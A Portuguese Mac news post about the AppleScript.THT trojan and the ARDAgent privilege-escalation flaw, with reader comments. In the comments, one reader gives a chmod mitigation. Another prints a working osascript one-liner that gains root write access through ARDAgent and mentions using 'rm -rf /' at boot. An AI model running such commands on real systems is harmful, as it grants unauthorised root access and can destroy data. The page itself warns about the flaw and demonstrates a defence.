SecureMac alerta para novo cavalo-de-tróia baseado no ARDAgent para o Mac OS X
A SecureMac identificou nesta semana um novo cavalo-de-tróia direcionado para usuários do Mac OS X: AppleScript.THT. O malware explora uma vulnerabilidade no Apple Remote Desktop Agent, permitindo que “um usuário malicioso tome acesso total ao sistema”.
A distribuição do trojan-horse é feita via um AppleScript compilado de nome ASthtv05 ou via um aplicativo chamado AStht_v06. O tamanho deles são de, respectivamente, 60KB e 3.1MB.
Mais uma vez, é necessária ação do usuário para que os scripts sejam executados e implementados no Mac. Após isto, o trojan instala-se na pasta /Library/Caches e define para que seja executado automaticamente na inicialização da máquina.
Fique alerta, portanto, ao baixar arquivos ou aplicativos AppleScript enviados para você por email, via iChat, baixados em sites na internet ou, principalmente, em redes P2P, como o LimeWire. A SecureMac e a Intego já atualizaram os softwares MacScan 2.5.2 e Intego VirusBarrier X5, ambos com proteções para a brecha.
[Dica do Eduardo Medeiros, obrigado!]
ok ok…. WTF? agora vamos ter que usar anti-virus no mac? ¬¬
Não, basta você não usar o seu usuário como administrador, e não autorizar a instalação de programas estranhos. Por enquanto, no Mac, todos os “vírus” que apareceram necessitavam ser baixados pelo usuário, instalados com a autorização de sua senha de administrador. Nunca ninguém foi afetado por qualquer vírus destes, e muitos deles são apenas conceituais. Se você fizer a lição de casa direitinho, pode descansar que ninguém vai entrar em seu computador sem ser chamado.
Ah, e logo, logo, a Apple fecha essa brecha com algum Security Update, ok? Até só tome algum cuidado, nada desesperador como acontece com o Windows.
Nao tem nem comparacao com o Windows.
ou seja, so é afectado qem disser “sim, pode instalar”. certo ?
@Onil, exato.
Bom, assim fico mais aliviado, ufa!
Não, basta você não usar o seu usuário como administrador, e não autorizar a instalação de programas estranhos. Por enquanto, no Mac, todos os “vírus” que apareceram necessitavam ser baixados pelo usuário, instalados com a autorização de sua senha de administrador. Nunca ninguém foi afetado por qualquer vírus destes, e muitos deles são apenas conceituais. Se você fizer a lição de casa direitinho, pode descansar que ninguém vai entrar em seu computador sem ser chamado.²
Flow tudo. ;)
Ok, não é o fim do mundo, mas não da pra vacilar ! Qualquer zé ruela com acesso local ao seu mac pode ganhar privilégios de ROOT com apenas 1 comando.
Considero essa falha gravissíma pois NÃO É necessário que o usuário forneça senha de administrador ! Tudo que um trojan desse tipo precisa pra se instalar é RODAR na máquina. Uma vez executado ele se instala onde um usuário sem privilégios jamais teria acesso sem fornecer sua senha (caso esteja no grupo admin)
Essa falha de segurança não é como as outras onde a componente principal era a ingenuidade do usuário administrador. Nesse caso, o simples ato de executar um aplicativo, não importa a casta do user, compromete TODA a máquina e não apenas o usuário vacilão.
Para resolver o problema de verdade só tem um jeito, sumir com o ARD do seu sistema, seja deletando , escondendo ou retirando o SUID root do executavel , com o comando no terminal :
sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
Esse comando retira os superpoderes do programa ARD, e provavelmente ele não vai funcionar direto :-\
E o pior, provavelmente o sistema voltará a ser vulnerável se o usuário reparar as permissões !!!!
Oh My Good, falha gravissima da poderes de sudo para user comum.
Olha ae que fiz para provar. E se no lugar do Apple Brasil eu colocar rm -rf / dentro de algo que da boot? Creu Sistema. Com a dica do Liquuid isso não acontece.
MacBook:~ cabral$ cat /etc/resolv.conf
nameserver 127.0.0.1
nameserver 208.67.222.222
nameserver 208.67.220.220
nameserver 192.168.1.1
nameserver 0.0.0.0
MacBook:~ cabral$ echo Apple Brasil >> /etc/resolv.conf
-bash: /etc/resolv.conf: Permission denied
MacBook:~ cabral$ osascript -e ‘tell app “ARDAgent” to do shell script “echo Apple Brasil > /etc/resolv.conf”‘
MacBook:~ cabral$ cat /etc/resolv.conf
Apple Brasil
Com a dica fica assim:
MacBook:~ cabral$ osascript -e ‘tell app “ARDAgent” to do shell script “echo Apple Brasil > /etc/resolv.conf”‘
23:77: execution error: ARDAgent got an error: sh: /etc/resolv.conf: Permission denied (1)